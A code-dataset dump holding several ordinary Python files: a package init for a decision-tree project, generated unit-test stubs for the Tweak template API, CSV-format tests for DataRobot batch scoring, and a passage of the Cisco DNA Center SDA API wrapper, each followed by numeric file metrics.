| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c467753646f7c06d4ae44189e27332f84930fb21
| 287
|
py
|
Python
|
processing/__init__.py
|
CoderWota/C4.5_with_Adaboost
|
ceab0b0ad266c297c7c4cb4d747b891bf179d255
|
[
"Apache-2.0"
] | null | null | null |
processing/__init__.py
|
CoderWota/C4.5_with_Adaboost
|
ceab0b0ad266c297c7c4cb4d747b891bf179d255
|
[
"Apache-2.0"
] | null | null | null |
processing/__init__.py
|
CoderWota/C4.5_with_Adaboost
|
ceab0b0ad266c297c7c4cb4d747b891bf179d255
|
[
"Apache-2.0"
] | null | null | null |
import sys
sys.path.append(".")
from dctree.processing.coding import encoding
from dctree.processing.coding import decoding_tree
from dctree.processing.coding import encoding_input
from dctree.processing.coding import decoding_predicts
from dctree.processing.coding import encoding_label
| 41
| 54
| 0.864111
| 39
| 287
| 6.25641
| 0.358974
| 0.204918
| 0.409836
| 0.532787
| 0.819672
| 0.819672
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076655
| 287
| 7
| 55
| 41
| 0.920755
| 0
| 0
| 0
| 0
| 0
| 0.003472
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.857143
| 0
| 0.857143
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
67305d7103801f22e1d11074be6a61ae8efb7187
| 16,470
|
py
|
Python
|
test/test_template_api.py
|
tweak-com-public/tweak-api-client-python
|
019f86da11fdb12683d516f8f37db5d717380bcc
|
[
"Apache-2.0"
] | null | null | null |
test/test_template_api.py
|
tweak-com-public/tweak-api-client-python
|
019f86da11fdb12683d516f8f37db5d717380bcc
|
[
"Apache-2.0"
] | null | null | null |
test/test_template_api.py
|
tweak-com-public/tweak-api-client-python
|
019f86da11fdb12683d516f8f37db5d717380bcc
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
tweak-api
Tweak API to integrate with all the Tweak services. You can find out more about Tweak at <a href='https://www.tweak.com'>https://www.tweak.com</a>, #tweak.
OpenAPI spec version: 1.0.8-beta.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import os
import sys
import unittest
import TweakApi
from TweakApi.rest import ApiException
from TweakApi.apis.template_api import TemplateApi
class TestTemplateApi(unittest.TestCase):
""" TemplateApi unit test stubs """
def setUp(self):
self.api = TweakApi.apis.template_api.TemplateApi()
def tearDown(self):
pass
def test_templates_change_stream_get(self):
"""
Test case for templates_change_stream_get
Create a change stream.
"""
pass
def test_templates_change_stream_post(self):
"""
Test case for templates_change_stream_post
Create a change stream.
"""
pass
def test_templates_count_get(self):
"""
Test case for templates_count_get
Count instances of the model matched by where from the data source.
"""
pass
def test_templates_find_one_get(self):
"""
Test case for templates_find_one_get
Find first instance of the model matched by filter from the data source.
"""
pass
def test_templates_get(self):
"""
Test case for templates_get
Find all instances of the model matched by filter from the data source.
"""
pass
def test_templates_id_delete(self):
"""
Test case for templates_id_delete
Delete a model instance by {{id}} from the data source.
"""
pass
def test_templates_id_designs_count_get(self):
"""
Test case for templates_id_designs_count_get
Counts designs of Template.
"""
pass
def test_templates_id_designs_fk_delete(self):
"""
Test case for templates_id_designs_fk_delete
Delete a related item by id for designs.
"""
pass
def test_templates_id_designs_fk_get(self):
"""
Test case for templates_id_designs_fk_get
Find a related item by id for designs.
"""
pass
def test_templates_id_designs_fk_put(self):
"""
Test case for templates_id_designs_fk_put
Update a related item by id for designs.
"""
pass
def test_templates_id_designs_generate_post(self):
"""
Test case for templates_id_designs_generate_post
Generate design from template
"""
pass
def test_templates_id_designs_get(self):
"""
Test case for templates_id_designs_get
Queries designs of Template.
"""
pass
def test_templates_id_designs_post(self):
"""
Test case for templates_id_designs_post
Creates a new instance in designs of this model.
"""
pass
def test_templates_id_exists_get(self):
"""
Test case for templates_id_exists_get
Check whether a model instance exists in the data source.
"""
pass
def test_templates_id_get(self):
"""
Test case for templates_id_get
Find a model instance by {{id}} from the data source.
"""
pass
def test_templates_id_head(self):
"""
Test case for templates_id_head
Check whether a model instance exists in the data source.
"""
pass
def test_templates_id_invitation_tickets_fk_delete(self):
"""
Test case for templates_id_invitation_tickets_fk_delete
Delete InvitationTickets for this Template
"""
pass
def test_templates_id_invitation_tickets_fk_get(self):
"""
Test case for templates_id_invitation_tickets_fk_get
Get InvitationTicket by Id for this Template
"""
pass
def test_templates_id_invitation_tickets_get(self):
"""
Test case for templates_id_invitation_tickets_get
List InvitationTickets for this Template
"""
pass
def test_templates_id_members_count_get(self):
"""
Test case for templates_id_members_count_get
Counts members of Template.
"""
pass
def test_templates_id_members_delete(self):
"""
Test case for templates_id_members_delete
Deletes all members of this model.
"""
pass
def test_templates_id_members_fk_delete(self):
"""
Test case for templates_id_members_fk_delete
Delete a related item by id for members.
"""
pass
def test_templates_id_members_fk_get(self):
"""
Test case for templates_id_members_fk_get
Find a related item by id for members.
"""
pass
def test_templates_id_members_fk_put(self):
"""
Test case for templates_id_members_fk_put
Update a related item by id for members.
"""
pass
def test_templates_id_members_get(self):
"""
Test case for templates_id_members_get
Queries members of Template.
"""
pass
def test_templates_id_members_post(self):
"""
Test case for templates_id_members_post
Creates a new instance in members of this model.
"""
pass
def test_templates_id_members_rel_fk_delete(self):
"""
Test case for templates_id_members_rel_fk_delete
Remove the members relation to an item by id.
"""
pass
def test_templates_id_members_rel_fk_head(self):
"""
Test case for templates_id_members_rel_fk_head
Check the existence of members relation to an item by id.
"""
pass
def test_templates_id_members_rel_fk_put(self):
"""
Test case for templates_id_members_rel_fk_put
Add a related item by id for members.
"""
pass
def test_templates_id_patch(self):
"""
Test case for templates_id_patch
Patch attributes for a model instance and persist it into the data source.
"""
pass
def test_templates_id_permission_delete(self):
"""
Test case for templates_id_permission_delete
Deletes permission of this model.
"""
pass
def test_templates_id_permission_get(self):
"""
Test case for templates_id_permission_get
Fetches hasOne relation permission.
"""
pass
def test_templates_id_permission_post(self):
"""
Test case for templates_id_permission_post
Creates a new instance in permission of this model.
"""
pass
def test_templates_id_permission_put(self):
"""
Test case for templates_id_permission_put
Update permission of this model.
"""
pass
def test_templates_id_portal_folders_count_get(self):
"""
Test case for templates_id_portal_folders_count_get
Counts portalFolders of Template.
"""
pass
def test_templates_id_portal_folders_delete(self):
"""
Test case for templates_id_portal_folders_delete
Deletes all portalFolders of this model.
"""
pass
def test_templates_id_portal_folders_fk_delete(self):
"""
Test case for templates_id_portal_folders_fk_delete
Delete a related item by id for portalFolders.
"""
pass
def test_templates_id_portal_folders_fk_get(self):
"""
Test case for templates_id_portal_folders_fk_get
Find a related item by id for portalFolders.
"""
pass
def test_templates_id_portal_folders_fk_put(self):
"""
Test case for templates_id_portal_folders_fk_put
Update a related item by id for portalFolders.
"""
pass
def test_templates_id_portal_folders_get(self):
"""
Test case for templates_id_portal_folders_get
Queries portalFolders of Template.
"""
pass
def test_templates_id_portal_folders_post(self):
"""
Test case for templates_id_portal_folders_post
Creates a new instance in portalFolders of this model.
"""
pass
def test_templates_id_portal_folders_rel_fk_delete(self):
"""
Test case for templates_id_portal_folders_rel_fk_delete
Remove the portalFolders relation to an item by id.
"""
pass
def test_templates_id_portal_folders_rel_fk_head(self):
"""
Test case for templates_id_portal_folders_rel_fk_head
Check the existence of portalFolders relation to an item by id.
"""
pass
def test_templates_id_portal_folders_rel_fk_put(self):
"""
Test case for templates_id_portal_folders_rel_fk_put
Add a related item by id for portalFolders.
"""
pass
def test_templates_id_portals_count_get(self):
"""
Test case for templates_id_portals_count_get
Counts portals of Template.
"""
pass
def test_templates_id_portals_delete(self):
"""
Test case for templates_id_portals_delete
Deletes all portals of this model.
"""
pass
def test_templates_id_portals_fk_delete(self):
"""
Test case for templates_id_portals_fk_delete
Delete a related item by id for portals.
"""
pass
def test_templates_id_portals_fk_get(self):
"""
Test case for templates_id_portals_fk_get
Find a related item by id for portals.
"""
pass
def test_templates_id_portals_fk_put(self):
"""
Test case for templates_id_portals_fk_put
Update a related item by id for portals.
"""
pass
def test_templates_id_portals_get(self):
"""
Test case for templates_id_portals_get
Queries portals of Template.
"""
pass
def test_templates_id_portals_post(self):
"""
Test case for templates_id_portals_post
Creates a new instance in portals of this model.
"""
pass
def test_templates_id_portals_rel_fk_delete(self):
"""
Test case for templates_id_portals_rel_fk_delete
Remove the portals relation to an item by id.
"""
pass
def test_templates_id_portals_rel_fk_head(self):
"""
Test case for templates_id_portals_rel_fk_head
Check the existence of portals relation to an item by id.
"""
pass
def test_templates_id_portals_rel_fk_put(self):
"""
Test case for templates_id_portals_rel_fk_put
Add a related item by id for portals.
"""
pass
def test_templates_id_put(self):
"""
Test case for templates_id_put
Replace attributes for a model instance and persist it into the data source.
"""
pass
def test_templates_id_replace_post(self):
"""
Test case for templates_id_replace_post
Replace attributes for a model instance and persist it into the data source.
"""
pass
def test_templates_id_tags_count_get(self):
"""
Test case for templates_id_tags_count_get
Counts tags of Template.
"""
pass
def test_templates_id_tags_delete(self):
"""
Test case for templates_id_tags_delete
Deletes all tags of this model.
"""
pass
def test_templates_id_tags_fk_delete(self):
"""
Test case for templates_id_tags_fk_delete
Delete a related item by id for tags.
"""
pass
def test_templates_id_tags_fk_get(self):
"""
Test case for templates_id_tags_fk_get
Find a related item by id for tags.
"""
pass
def test_templates_id_tags_fk_put(self):
"""
Test case for templates_id_tags_fk_put
Update a related item by id for tags.
"""
pass
def test_templates_id_tags_get(self):
"""
Test case for templates_id_tags_get
Queries tags of Template.
"""
pass
def test_templates_id_tags_post(self):
"""
Test case for templates_id_tags_post
Creates a new instance in tags of this model.
"""
pass
def test_templates_id_tags_rel_fk_delete(self):
"""
Test case for templates_id_tags_rel_fk_delete
Remove the tags relation to an item by id.
"""
pass
def test_templates_id_tags_rel_fk_head(self):
"""
Test case for templates_id_tags_rel_fk_head
Check the existence of tags relation to an item by id.
"""
pass
def test_templates_id_tags_rel_fk_put(self):
"""
Test case for templates_id_tags_rel_fk_put
Add a related item by id for tags.
"""
pass
def test_templates_id_team_folder_get(self):
"""
Test case for templates_id_team_folder_get
Fetches belongsTo relation teamFolder.
"""
pass
def test_templates_id_team_get(self):
"""
Test case for templates_id_team_get
Fetches belongsTo relation team.
"""
pass
def test_templates_id_template_members_count_get(self):
"""
Test case for templates_id_template_members_count_get
Counts templateMembers of Template.
"""
pass
def test_templates_id_template_members_delete(self):
"""
Test case for templates_id_template_members_delete
Deletes all templateMembers of this model.
"""
pass
def test_templates_id_template_members_fk_delete(self):
"""
Test case for templates_id_template_members_fk_delete
Delete a related item by id for templateMembers.
"""
pass
def test_templates_id_template_members_fk_get(self):
"""
Test case for templates_id_template_members_fk_get
Find a related item by id for templateMembers.
"""
pass
def test_templates_id_template_members_fk_put(self):
"""
Test case for templates_id_template_members_fk_put
Update a related item by id for templateMembers.
"""
pass
def test_templates_id_template_members_get(self):
"""
Test case for templates_id_template_members_get
Queries templateMembers of Template.
"""
pass
def test_templates_id_template_members_post(self):
"""
Test case for templates_id_template_members_post
Creates a new instance in templateMembers of this model.
"""
pass
def test_templates_id_uploader_get(self):
"""
Test case for templates_id_uploader_get
Fetches belongsTo relation uploader.
"""
pass
def test_templates_id_url_review_get(self):
"""
Test case for templates_id_url_review_get
Get URL to review a template
"""
pass
def test_templates_id_workflow_get(self):
"""
Test case for templates_id_workflow_get
Fetches belongsTo relation workflow.
"""
pass
def test_templates_post(self):
"""
Test case for templates_post
Create a new instance of the model and persist it into the data source.
"""
pass
if __name__ == '__main__':
unittest.main()
| 24.220588
| 165
| 0.629508
| 2,094
| 16,470
| 4.619866
| 0.086915
| 0.166012
| 0.089828
| 0.163324
| 0.836882
| 0.81962
| 0.769589
| 0.684102
| 0.5767
| 0.379161
| 0
| 0.000799
| 0.315968
| 16,470
| 679
| 166
| 24.256259
| 0.857891
| 0.474924
| 0
| 0.465116
| 0
| 0
| 0.001305
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.47093
| false
| 0.465116
| 0.040698
| 0
| 0.517442
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
67408d48f4e9c6241af5291b85d36206cad0834d
| 11,420
|
py
|
Python
|
tests/test_csv_formats.py
|
satvidh/batch-scoring
|
13da21e813da3e757526b9c51f7dd1fe2b224603
|
[
"BSD-3-Clause"
] | 30
|
2016-03-03T10:29:15.000Z
|
2020-06-03T21:43:11.000Z
|
tests/test_csv_formats.py
|
satvidh/batch-scoring
|
13da21e813da3e757526b9c51f7dd1fe2b224603
|
[
"BSD-3-Clause"
] | 164
|
2016-03-03T12:31:22.000Z
|
2020-09-08T13:18:39.000Z
|
tests/test_csv_formats.py
|
satvidh/batch-scoring
|
13da21e813da3e757526b9c51f7dd1fe2b224603
|
[
"BSD-3-Clause"
] | 18
|
2016-05-12T13:50:05.000Z
|
2021-06-30T19:42:09.000Z
|
import csv
import tempfile
import pytest
from datarobot_batch_scoring.batch_scoring import run_batch_predictions
from utils import PickableMock
from datarobot_batch_scoring.reader import DETECT_SAMPLE_SIZE_SLOW
def test_gzipped_csv(live_server, ui):
base_url = '{webhost}/predApi/v1.0/'.format(webhost=live_server.url())
ret = run_batch_predictions(
base_url=base_url,
base_headers={},
user='username',
pwd='password',
api_token=None,
create_api_token=False,
pid='56dd9570018e213242dfa93c',
lid='56dd9570018e213242dfa93d',
import_id=None,
n_retry=3,
concurrent=1,
resume=False,
n_samples=10,
out_file='out.csv',
keep_cols=None,
delimiter=None,
dataset='tests/fixtures/temperatura_predict.csv.gz',
pred_name=None,
timeout=None,
ui=ui,
auto_sample=False,
fast_mode=False,
dry_run=False,
encoding='',
skip_dialect=False,
max_batch_size=1000
)
assert ret is None
def test_explicit_delimiter(live_server):
ui = PickableMock()
base_url = '{webhost}/predApi/v1.0/'.format(webhost=live_server.url())
ret = run_batch_predictions(
base_url=base_url,
base_headers={},
user='username',
pwd='password',
api_token=None,
create_api_token=False,
pid='56dd9570018e213242dfa93c',
lid='56dd9570018e213242dfa93d',
import_id=None,
n_retry=3,
concurrent=1,
resume=False,
n_samples=10,
out_file='out.csv',
keep_cols=None,
delimiter=',',
dataset='tests/fixtures/temperatura_predict.csv',
pred_name=None,
timeout=None,
ui=ui,
auto_sample=False,
fast_mode=False,
dry_run=False,
encoding='',
skip_dialect=False
)
assert ret is None
def test_explicit_delimiter_gzip(live_server):
ui = PickableMock()
base_url = '{webhost}/predApi/v1.0/'.format(webhost=live_server.url())
ret = run_batch_predictions(
base_url=base_url,
base_headers={},
user='username',
pwd='password',
api_token=None,
create_api_token=False,
pid='56dd9570018e213242dfa93c',
lid='56dd9570018e213242dfa93d',
import_id=None,
n_retry=3,
concurrent=1,
resume=False,
n_samples=10,
out_file='out.csv',
keep_cols=None,
delimiter=',',
dataset='tests/fixtures/temperatura_predict.csv.gz',
pred_name=None,
timeout=None,
ui=ui,
auto_sample=False,
fast_mode=False,
dry_run=False,
encoding='',
skip_dialect=False
)
assert ret is None
def test_tab_delimiter(live_server):
ui = PickableMock()
base_url = '{webhost}/predApi/v1.0/'.format(webhost=live_server.url())
ret = run_batch_predictions(
base_url=base_url,
base_headers={},
user='username',
pwd='password',
api_token=None,
create_api_token=False,
pid='56dd9570018e213242dfa93c',
lid='56dd9570018e213242dfa93d',
import_id=None,
n_retry=3,
concurrent=1,
resume=False,
n_samples=10,
out_file='out.csv',
keep_cols=None,
delimiter='\t',
dataset='tests/fixtures/temperatura_predict_tab.csv',
pred_name=None,
timeout=None,
ui=ui,
auto_sample=False,
fast_mode=False,
dry_run=False,
encoding='',
skip_dialect=False
)
assert ret is None
def test_empty_file(live_server):
ui = PickableMock()
base_url = '{webhost}/predApi/v1.0/'.format(webhost=live_server.url())
with pytest.raises(csv.Error) as ctx:
run_batch_predictions(
base_url=base_url,
base_headers={},
user='username',
pwd='password',
api_token=None,
create_api_token=False,
pid='56dd9570018e213242dfa93c',
lid='56dd9570018e213242dfa93d',
import_id=None,
n_retry=3,
concurrent=1,
resume=False,
n_samples=10,
out_file='out.csv',
keep_cols=None,
delimiter=',',
dataset='tests/fixtures/empty.csv',
pred_name=None,
timeout=None,
ui=ui,
auto_sample=False,
fast_mode=False,
dry_run=False,
encoding='',
skip_dialect=False
)
assert "The csv module failed to detect the CSV dialect." in str(ctx.value)
def test_no_delimiter(live_server):
ui = PickableMock()
base_url = '{webhost}/predApi/v1.0/'.format(webhost=live_server.url())
with pytest.raises(csv.Error) as ctx:
run_batch_predictions(
base_url=base_url,
base_headers={},
user='username',
pwd='password',
api_token=None,
create_api_token=False,
pid='56dd9570018e213242dfa93c',
lid='56dd9570018e213242dfa93d',
import_id=None,
n_retry=3,
concurrent=1,
resume=False,
n_samples=10,
out_file='out.csv',
keep_cols=None,
delimiter=';',
dataset='tests/fixtures/temperatura_predict.csv',
pred_name=None,
timeout=None,
ui=ui,
auto_sample=False,
fast_mode=False,
dry_run=False,
encoding='',
skip_dialect=False
)
assert str(ctx.value) == ("Could not determine delimiter")
def test_bad_newline(live_server):
ui = PickableMock()
base_url = '{webhost}/predApi/v1.0/'.format(webhost=live_server.url())
run_batch_predictions(
base_url=base_url,
base_headers={},
user='username',
pwd='password',
api_token=None,
create_api_token=False,
pid='56dd9570018e213242dfa93c',
lid='56dd9570018e213242dfa93d',
import_id=None,
n_retry=3,
concurrent=1,
resume=False,
n_samples=10,
out_file='out.csv',
keep_cols=None,
delimiter=',',
dataset='tests/fixtures/diabetes_bad_newline.csv',
pred_name=None,
timeout=None,
ui=ui,
auto_sample=False,
fast_mode=False,
dry_run=False,
encoding='',
skip_dialect=False
)
lines = len(open('out.csv', 'rb').readlines())
assert lines == 5
ui.warning.assert_any_call('Detected empty rows in the CSV file. '
'These rows will be discarded.')
def test_header_only(live_server):
ui = PickableMock()
base_url = '{webhost}/predApi/v1.0/'.format(webhost=live_server.url())
with pytest.raises(ValueError) as ctx:
run_batch_predictions(
base_url=base_url,
base_headers={},
user='username',
pwd='password',
api_token=None,
create_api_token=False,
pid='56dd9570018e213242dfa93c',
lid='56dd9570018e213242dfa93d',
import_id=None,
n_retry=3,
concurrent=1,
resume=False,
n_samples=10,
out_file='out.csv',
keep_cols=None,
delimiter=',',
dataset='tests/fixtures/header_only.csv',
pred_name=None,
timeout=None,
ui=ui,
auto_sample=False,
fast_mode=False,
dry_run=False,
encoding='',
skip_dialect=False
)
assert str(ctx.value) == ("Input file 'tests/fixtures/header_only.csv' "
"is empty.")
def test_quotechar_in_keep_cols(live_server):
base_url = '{webhost}/predApi/v1.0/'.format(webhost=live_server.url())
ui = PickableMock()
with tempfile.NamedTemporaryFile(prefix='test_',
suffix='.csv',
delete=False) as fd:
head = open("tests/fixtures/quotes_input_head.csv",
"rb").read()
body_1 = open("tests/fixtures/quotes_input_first_part.csv",
"rb").read()
body_2 = open("tests/fixtures/quotes_input_bad_part.csv",
"rb").read()
fd.file.write(head)
size = 0
while size < DETECT_SAMPLE_SIZE_SLOW:
fd.file.write(body_1)
size += len(body_1)
fd.file.write(body_2)
fd.close()
ret = run_batch_predictions(
base_url=base_url,
base_headers={},
user='username',
pwd='password',
api_token=None,
create_api_token=False,
pid='56dd9570018e213242dfa93c',
lid='56dd9570018e213242dfa93d',
import_id=None,
n_retry=3,
concurrent=1,
resume=False,
n_samples=10,
out_file='out.csv',
keep_cols=["b", "c"],
delimiter=None,
dataset=fd.name,
pred_name=None,
timeout=None,
ui=ui,
auto_sample=True,
fast_mode=False,
dry_run=False,
encoding='',
skip_dialect=False
)
assert ret is None
last_line = open("out.csv", "rb").readlines()[-1]
expected_last_line = b'1044,2,"eeeeeeee ""eeeeee"" eeeeeeeeeeee'
assert last_line[:len(expected_last_line)] == expected_last_line
def test_quoted_newline_in_keep_cols_in_fast_mode_fails(live_server):
base_url = '{webhost}/predApi/v1.0/'.format(webhost=live_server.url())
ui = PickableMock()
with tempfile.NamedTemporaryFile(prefix='test_',
suffix='.csv',
delete=False) as fd:
head = open("tests/fixtures/quotes_input_head.csv",
"rb").read()
body_1 = open("tests/fixtures/quotes_input_first_part.csv",
"rb").read()
body_2 = open("tests/fixtures/quotes_input_bad_part_with_newline.csv",
"rb").read()
fd.file.write(head)
size = 0
while size < DETECT_SAMPLE_SIZE_SLOW:
fd.file.write(body_1)
size += len(body_1)
fd.file.write(body_2)
fd.close()
ret = run_batch_predictions(
base_url=base_url,
base_headers={},
user='username',
pwd='password',
api_token=None,
create_api_token=False,
pid='56dd9570018e213242dfa93c',
lid='56dd9570018e213242dfa93d',
import_id=None,
n_retry=3,
concurrent=1,
resume=False,
n_samples=10,
out_file='out.csv',
keep_cols=["b", "c"],
delimiter=None,
dataset=fd.name,
pred_name=None,
timeout=None,
ui=ui,
auto_sample=True,
fast_mode=True,
dry_run=False,
encoding='',
skip_dialect=False
)
assert ret == 1
| 29.282051
| 79
| 0.551839
| 1,233
| 11,420
| 4.861314
| 0.121655
| 0.035035
| 0.036703
| 0.035035
| 0.881882
| 0.862529
| 0.862529
| 0.862529
| 0.854688
| 0.854688
| 0
| 0.056316
| 0.340718
| 11,420
| 389
| 80
| 29.357326
| 0.739806
| 0
| 0
| 0.860335
| 0
| 0
| 0.155692
| 0.112434
| 0
| 0
| 0
| 0
| 0.03352
| 1
| 0.027933
| false
| 0.027933
| 0.044693
| 0
| 0.072626
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6779ebaa1c94be3e27e50cd2e3b1780901867b2a
| 109,740
|
py
|
Python
|
dnacentersdk/api/v2_2_2_3/sda.py
|
oboehmer/dnacentersdk
|
25c4e99900640deee91a56aa886874d9cb0ca960
|
[
"MIT"
] | 32
|
2019-09-05T05:16:56.000Z
|
2022-03-22T09:50:38.000Z
|
dnacentersdk/api/v2_2_2_3/sda.py
|
oboehmer/dnacentersdk
|
25c4e99900640deee91a56aa886874d9cb0ca960
|
[
"MIT"
] | 35
|
2019-09-07T18:58:54.000Z
|
2022-03-24T19:29:36.000Z
|
dnacentersdk/api/v2_2_2_3/sda.py
|
oboehmer/dnacentersdk
|
25c4e99900640deee91a56aa886874d9cb0ca960
|
[
"MIT"
] | 18
|
2019-09-09T11:07:21.000Z
|
2022-03-25T08:49:59.000Z
|
# -*- coding: utf-8 -*-
"""Cisco DNA Center SDA API wrapper.
Copyright (c) 2019-2021 Cisco Systems.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
from builtins import *
from past.builtins import basestring
from ...restsession import RestSession
from ...utils import (
check_type,
dict_from_items_with_values,
apply_path_params,
dict_of_str,
)
class Sda(object):
"""Cisco DNA Center SDA API (version: 2.2.2.3).
Wraps the DNA Center SDA
API and exposes the API as native Python
methods that return native Python objects.
"""
def __init__(self, session, object_factory, request_validator):
"""Initialize a new Sda
object with the provided RestSession.
Args:
session(RestSession): The RESTful session object to be used for
API calls to the DNA Center service.
Raises:
TypeError: If the parameter types are incorrect.
"""
check_type(session, RestSession)
super(Sda, self).__init__()
self._session = session
self._object_factory = object_factory
self._request_validator = request_validator
def get_default_authentication_profile(self,
site_name_hierarchy,
headers=None,
**request_parameters):
"""Get default authentication profile from SDA Fabric .
Args:
site_name_hierarchy(basestring): siteNameHierarchy query parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(site_name_hierarchy, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'siteNameHierarchy':
site_name_hierarchy,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/authentication-profile')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_e414dcbeeabd5a359352a0e2ad5ec3f5_v2_2_2_3', json_data)
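# Hedged usage sketch (not generated code): with an authenticated dnacentersdk
# client, e.g. dnac = DNACenterAPI(username=..., password=..., base_url=...),
# the method above is reached as
#   profile = dnac.sda.get_default_authentication_profile(
#       site_name_hierarchy="Global/Area-1")
# where "Global/Area-1" is only an illustrative site hierarchy value.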
def add_default_authentication_profile(self,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Add default authentication profile in SDA Fabric .
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(list): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, list)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
_payload = payload or []
if active_validation:
self._request_validator('jsd_d1d42ef2f1895a82a2830bf1353e6baa_v2_2_2_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/authentication-profile')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload)
return self._object_factory('bpm_d1d42ef2f1895a82a2830bf1353e6baa_v2_2_2_3', json_data)
def update_default_authentication_profile(self,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Update default authentication profile in SDA Fabric .
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(list): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, list)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
_payload = payload or []
if active_validation:
self._request_validator('jsd_d999a1d36ee52babb6b619877dad734_v2_2_2_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/authentication-profile')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.put(endpoint_full_url, params=_params,
json=_payload,
headers=_headers)
else:
json_data = self._session.put(endpoint_full_url, params=_params,
json=_payload)
